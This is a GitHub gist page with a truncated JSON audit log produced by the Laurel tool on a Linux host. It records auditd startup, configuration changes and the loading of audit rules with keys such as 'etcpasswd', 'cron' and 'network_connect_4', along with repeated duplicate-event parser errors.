Skip to content

Instantly share code, notes, and snippets.

@cbresponse

cbresponse/omigod2.json

Created September 24, 2021 09:54
Show Gist options
  • Save cbresponse/f0500743f0f1c0ad814883ff88bd16f3 to your computer and use it in GitHub Desktop.
Save cbresponse/f0500743f0f1c0ad814883ff88bd16f3 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
omigod2.json
This file has been truncated, but you can view the full file.
{
"notice": {
"program": "/usr/local/sbin/laurel",
"action": "start",
"euid": 996,
"version": "0.1.2",
"config": {
"user": "_laurel",
"directory": "/var/log/laurel",
"auditlog": {
"file": "audit.log",
"read-users": [
"null"
],
"size": 1000000,
"generations": 10
},
"debuglog": null
}
}
}
{
"notice": {
"program": "/usr/local/sbin/laurel",
"action": "start",
"euid": 996,
"version": "0.1.2",
"config": {
"user": "_laurel",
"directory": "/var/log/laurel",
"auditlog": {
"file": "audit.log",
"read-users": [
"null"
],
"size": 1000000,
"generations": 10
},
"debuglog": null
}
}
}
{
"ID": "1632469902.097:58",
"DAEMON_START": {
"op": "start",
"ver": "2.8.5",
"format": "raw",
"kernel": "5.4.0-86-generic",
"auid": 4294967295,
"pid": 7403,
"uid": 0,
"ses": 4294967295,
"subj": "unconfined",
"res": "success"
}
}
{
"ID": "1632469902.146:72",
"CONFIG_CHANGE": {
"op": "set",
"audit_backlog_limit": 8192,
"old": "8192",
"auid": 4294967295,
"ses": 4294967295,
"res": 1
}
}
{
"ID": "1632469902.146:73",
"CONFIG_CHANGE": {
"op": "set",
"audit_failure": 1,
"old": "1",
"auid": 4294967295,
"ses": 4294967295,
"res": 1
}
}
{
"ID": "1632469902.146:74",
"CONFIG_CHANGE": {
"op": "set",
"audit_backlog_wait_time": 0,
"old": "0",
"auid": 4294967295,
"ses": 4294967295,
"res": 1
}
}
{
"ID": "1632469902.146:75",
"SERVICE_START": {
"pid": 1,
"uid": 0,
"auid": 4294967295,
"ses": 4294967295,
"msg": "unit=auditd comm=\"systemd\" exe=\"/usr/lib/systemd/systemd\" hostname=? addr=? terminal=? res=success"
}
}
{
"notice": {
"program": "/usr/local/sbin/laurel",
"action": "start",
"euid": 996,
"version": "0.1.2",
"config": {
"user": "_laurel",
"directory": "/var/log/laurel",
"auditlog": {
"file": "audit.log",
"read-users": [
"null"
],
"size": 1000000,
"generations": 10
},
"debuglog": null
}
}
}
{
"ID": "1632470377.967:6354",
"DAEMON_START": {
"op": "start",
"ver": "2.8.5",
"format": "raw",
"kernel": "5.4.0-86-generic",
"auid": 4294967295,
"pid": 7499,
"uid": 0,
"ses": 4294967295,
"subj": "unconfined",
"res": "success"
}
}
{
"ID": "1632470378.011:80",
"CONFIG_CHANGE": {
"op": "set",
"audit_backlog_limit": 8192,
"old": "8192",
"auid": 4294967295,
"ses": 4294967295,
"res": 1
}
}
{
"ID": "1632470378.015:81",
"CONFIG_CHANGE": {
"op": "set",
"audit_failure": 1,
"old": "1",
"auid": 4294967295,
"ses": 4294967295,
"res": 1
}
}
{
"ID": "1632470378.019:82",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "auditlog",
"list": 4,
"res": 1
}
}
{
"ID": "1632470378.019:83",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "auditconfig",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.019:83",
"input": "node=null type=EOE msg=audit(1632470378.019:83): \n"
}
}
{
"ID": "1632470378.019:84",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "auditconfig",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.019:84",
"input": "node=null type=EOE msg=audit(1632470378.019:84): \n"
}
}
{
"ID": "1632470378.019:85",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "audispconfig",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.019:85",
"input": "node=null type=EOE msg=audit(1632470378.019:85): \n"
}
}
{
"ID": "1632470378.019:86",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "audittools",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.019:86",
"input": "node=null type=EOE msg=audit(1632470378.019:86): \n"
}
}
{
"ID": "1632470378.019:87",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "audittools",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.019:87",
"input": "node=null type=EOE msg=audit(1632470378.019:87): \n"
}
}
{
"ID": "1632470378.019:88",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "audittools",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.019:88",
"input": "node=null type=EOE msg=audit(1632470378.019:88): \n"
}
}
{
"ID": "1632470378.023:89",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": null,
"list": 5,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.023:89",
"input": "node=null type=EOE msg=audit(1632470378.023:89): \n"
}
}
{
"ID": "1632470378.023:90",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": null,
"list": 0,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.023:90",
"input": "node=null type=EOE msg=audit(1632470378.023:90): \n"
}
}
{
"ID": "1632470378.023:91",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": null,
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.023:91",
"input": "node=null type=EOE msg=audit(1632470378.023:91): \n"
}
}
{
"ID": "1632470378.023:92",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": null,
"list": 5,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.023:92",
"input": "node=null type=EOE msg=audit(1632470378.023:92): \n"
}
}
{
"ID": "1632470378.023:93",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": null,
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.023:93",
"input": "node=null type=EOE msg=audit(1632470378.023:93): \n"
}
}
{
"ID": "1632470378.027:94",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": null,
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.027:94",
"input": "node=null type=EOE msg=audit(1632470378.027:94): \n"
}
}
{
"ID": "1632470378.027:95",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "sharedmemaccess",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.027:95",
"input": "node=null type=EOE msg=audit(1632470378.027:95): \n"
}
}
{
"ID": "1632470378.027:96",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "sharedmemaccess",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.027:96",
"input": "node=null type=EOE msg=audit(1632470378.027:96): \n"
}
}
{
"ID": "1632470378.027:97",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "locklvm",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.027:97",
"input": "node=null type=EOE msg=audit(1632470378.027:97): \n"
}
}
{
"ID": "1632470378.027:98",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "locklvm",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.027:98",
"input": "node=null type=EOE msg=audit(1632470378.027:98): \n"
}
}
{
"ID": "1632470378.027:99",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "sysctl",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.027:99",
"input": "node=null type=EOE msg=audit(1632470378.027:99): \n"
}
}
{
"ID": "1632470378.031:100",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "sysctl",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.031:100",
"input": "node=null type=EOE msg=audit(1632470378.031:100): \n"
}
}
{
"ID": "1632470378.031:101",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "modules",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.031:101",
"input": "node=null type=EOE msg=audit(1632470378.031:101): \n"
}
}
{
"ID": "1632470378.031:102",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "modules",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.031:102",
"input": "node=null type=EOE msg=audit(1632470378.031:102): \n"
}
}
{
"ID": "1632470378.031:103",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "modules",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.031:103",
"input": "node=null type=EOE msg=audit(1632470378.031:103): \n"
}
}
{
"ID": "1632470378.035:104",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "modules",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.035:104",
"input": "node=null type=EOE msg=audit(1632470378.035:104): \n"
}
}
{
"ID": "1632470378.035:105",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "modules",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.035:105",
"input": "node=null type=EOE msg=audit(1632470378.035:105): \n"
}
}
{
"ID": "1632470378.035:106",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "modprobe",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.035:106",
"input": "node=null type=EOE msg=audit(1632470378.035:106): \n"
}
}
{
"ID": "1632470378.035:107",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "modprobe",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.035:107",
"input": "node=null type=EOE msg=audit(1632470378.035:107): \n"
}
}
{
"ID": "1632470378.035:108",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "KEXEC",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.035:108",
"input": "node=null type=EOE msg=audit(1632470378.035:108): \n"
}
}
{
"ID": "1632470378.035:109",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "KEXEC",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.035:109",
"input": "node=null type=EOE msg=audit(1632470378.035:109): \n"
}
}
{
"ID": "1632470378.035:110",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "specialfiles",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.035:110",
"input": "node=null type=EOE msg=audit(1632470378.035:110): \n"
}
}
{
"ID": "1632470378.035:111",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "specialfiles",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.035:111",
"input": "node=null type=EOE msg=audit(1632470378.035:111): \n"
}
}
{
"ID": "1632470378.039:112",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "mount",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.039:112",
"input": "node=null type=EOE msg=audit(1632470378.039:112): \n"
}
}
{
"ID": "1632470378.039:113",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "mount",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.039:113",
"input": "node=null type=EOE msg=audit(1632470378.039:113): \n"
}
}
{
"ID": "1632470378.039:114",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "swap",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.039:114",
"input": "node=null type=EOE msg=audit(1632470378.039:114): \n"
}
}
{
"ID": "1632470378.039:115",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "swap",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.039:115",
"input": "node=null type=EOE msg=audit(1632470378.039:115): \n"
}
}
{
"ID": "1632470378.039:116",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "localtime",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.039:116",
"input": "node=null type=EOE msg=audit(1632470378.039:116): \n"
}
}
{
"ID": "1632470378.043:117",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "stunnel",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.043:117",
"input": "node=null type=EOE msg=audit(1632470378.043:117): \n"
}
}
{
"ID": "1632470378.043:118",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "stunnel",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.043:118",
"input": "node=null type=EOE msg=audit(1632470378.043:118): \n"
}
}
{
"ID": "1632470378.043:119",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "cron",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.043:119",
"input": "node=null type=EOE msg=audit(1632470378.043:119): \n"
}
}
{
"ID": "1632470378.043:120",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "cron",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.043:120",
"input": "node=null type=EOE msg=audit(1632470378.043:120): \n"
}
}
{
"ID": "1632470378.043:121",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "cron",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.043:121",
"input": "node=null type=EOE msg=audit(1632470378.043:121): \n"
}
}
{
"ID": "1632470378.043:122",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "cron",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.043:122",
"input": "node=null type=EOE msg=audit(1632470378.043:122): \n"
}
}
{
"ID": "1632470378.047:123",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "cron",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.047:123",
"input": "node=null type=EOE msg=audit(1632470378.047:123): \n"
}
}
{
"ID": "1632470378.047:124",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "cron",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.047:124",
"input": "node=null type=EOE msg=audit(1632470378.047:124): \n"
}
}
{
"ID": "1632470378.047:125",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "cron",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.047:125",
"input": "node=null type=EOE msg=audit(1632470378.047:125): \n"
}
}
{
"ID": "1632470378.047:126",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "cron",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.047:126",
"input": "node=null type=EOE msg=audit(1632470378.047:126): \n"
}
}
{
"ID": "1632470378.047:127",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "cron",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.047:127",
"input": "node=null type=EOE msg=audit(1632470378.047:127): \n"
}
}
{
"ID": "1632470378.051:128",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "etcgroup",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.051:128",
"input": "node=null type=EOE msg=audit(1632470378.051:128): \n"
}
}
{
"ID": "1632470378.051:129",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "etcpasswd",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.051:129",
"input": "node=null type=EOE msg=audit(1632470378.051:129): \n"
}
}
{
"ID": "1632470378.051:130",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "etcgroup",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.051:130",
"input": "node=null type=EOE msg=audit(1632470378.051:130): \n"
}
}
{
"ID": "1632470378.051:131",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "etcpasswd",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.051:131",
"input": "node=null type=EOE msg=audit(1632470378.051:131): \n"
}
}
{
"ID": "1632470378.055:132",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "opasswd",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.055:132",
"input": "node=null type=EOE msg=audit(1632470378.055:132): \n"
}
}
{
"ID": "1632470378.055:133",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "actions",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.055:133",
"input": "node=null type=EOE msg=audit(1632470378.055:133): \n"
}
}
{
"ID": "1632470378.055:134",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "actions",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.055:134",
"input": "node=null type=EOE msg=audit(1632470378.055:134): \n"
}
}
{
"ID": "1632470378.055:135",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "passwd_modification",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.055:135",
"input": "node=null type=EOE msg=audit(1632470378.055:135): \n"
}
}
{
"ID": "1632470378.059:136",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "group_modification",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.059:136",
"input": "node=null type=EOE msg=audit(1632470378.059:136): \n"
}
}
{
"ID": "1632470378.059:137",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "group_modification",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.059:137",
"input": "node=null type=EOE msg=audit(1632470378.059:137): \n"
}
}
{
"ID": "1632470378.059:138",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "group_modification",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.059:138",
"input": "node=null type=EOE msg=audit(1632470378.059:138): \n"
}
}
{
"ID": "1632470378.059:139",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "user_modification",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.059:139",
"input": "node=null type=EOE msg=audit(1632470378.059:139): \n"
}
}
{
"ID": "1632470378.059:140",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "user_modification",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.059:140",
"input": "node=null type=EOE msg=audit(1632470378.059:140): \n"
}
}
{
"ID": "1632470378.063:141",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "user_modification",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.063:141",
"input": "node=null type=EOE msg=audit(1632470378.063:141): \n"
}
}
{
"ID": "1632470378.063:142",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "user_modification",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.063:142",
"input": "node=null type=EOE msg=audit(1632470378.063:142): \n"
}
}
{
"ID": "1632470378.063:143",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "login",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.063:143",
"input": "node=null type=EOE msg=audit(1632470378.063:143): \n"
}
}
{
"ID": "1632470378.063:144",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "login",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.063:144",
"input": "node=null type=EOE msg=audit(1632470378.063:144): \n"
}
}
{
"ID": "1632470378.063:145",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "login",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.063:145",
"input": "node=null type=EOE msg=audit(1632470378.063:145): \n"
}
}
{
"ID": "1632470378.063:146",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "login",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.063:146",
"input": "node=null type=EOE msg=audit(1632470378.063:146): \n"
}
}
{
"ID": "1632470378.067:147",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "login",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.067:147",
"input": "node=null type=EOE msg=audit(1632470378.067:147): \n"
}
}
{
"ID": "1632470378.067:148",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "network_modifications",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.067:148",
"input": "node=null type=EOE msg=audit(1632470378.067:148): \n"
}
}
{
"ID": "1632470378.067:149",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "network_modifications",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.067:149",
"input": "node=null type=EOE msg=audit(1632470378.067:149): \n"
}
}
{
"ID": "1632470378.067:150",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "network_connect_4",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.067:150",
"input": "node=null type=EOE msg=audit(1632470378.067:150): \n"
}
}
{
"ID": "1632470378.067:151",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "network_connect_4",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.067:151",
"input": "node=null type=EOE msg=audit(1632470378.067:151): \n"
}
}
{
"ID": "1632470378.067:152",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "network_connect_6",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.067:152",
"input": "node=null type=EOE msg=audit(1632470378.067:152): \n"
}
}
{
"ID": "1632470378.067:153",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "network_connect_6",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.067:153",
"input": "node=null type=EOE msg=audit(1632470378.067:153): \n"
}
}
{
"ID": "1632470378.071:154",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "network_modifications",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.071:154",
"input": "node=null type=EOE msg=audit(1632470378.071:154): \n"
}
}
{
"ID": "1632470378.071:155",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "network_modifications",
"list": 4,
"res": 0
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.071:155",
"input": "node=null type=EOE msg=audit(1632470378.071:155): \n"
}
}
{
"ID": "1632470378.071:156",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "network_modifications",
"list": 4,
"res": 0
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.071:156",
"input": "node=null type=EOE msg=audit(1632470378.071:156): \n"
}
}
{
"ID": "1632470378.071:157",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "network",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.071:157",
"input": "node=null type=EOE msg=audit(1632470378.071:157): \n"
}
}
{
"ID": "1632470378.071:158",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "network_modifications",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.071:158",
"input": "node=null type=EOE msg=audit(1632470378.071:158): \n"
}
}
{
"ID": "1632470378.075:159",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "etcissue",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.075:159",
"input": "node=null type=EOE msg=audit(1632470378.075:159): \n"
}
}
{
"ID": "1632470378.075:160",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "etcissue",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.075:160",
"input": "node=null type=EOE msg=audit(1632470378.075:160): \n"
}
}
{
"ID": "1632470378.075:161",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "init",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.075:161",
"input": "node=null type=EOE msg=audit(1632470378.075:161): \n"
}
}
{
"ID": "1632470378.075:162",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "init",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.075:162",
"input": "node=null type=EOE msg=audit(1632470378.075:162): \n"
}
}
{
"ID": "1632470378.075:163",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "init",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.075:163",
"input": "node=null type=EOE msg=audit(1632470378.075:163): \n"
}
}
{
"ID": "1632470378.075:164",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "libpath",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.075:164",
"input": "node=null type=EOE msg=audit(1632470378.075:164): \n"
}
}
{
"ID": "1632470378.079:165",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "libpath",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.079:165",
"input": "node=null type=EOE msg=audit(1632470378.079:165): \n"
}
}
{
"ID": "1632470378.079:166",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "systemwide_preloads",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.079:166",
"input": "node=null type=EOE msg=audit(1632470378.079:166): \n"
}
}
{
"ID": "1632470378.079:167",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "pam",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.079:167",
"input": "node=null type=EOE msg=audit(1632470378.079:167): \n"
}
}
{
"ID": "1632470378.079:168",
"CONFIG_CHANGE": {
"auid": 4294967295,
"ses": 4294967295,
"op": "add_rule",
"key": "pam",
"list": 4,
"res": 1
}
}
{
"error": {
"message": "duplicate EOE for id 1632470378.079:168",
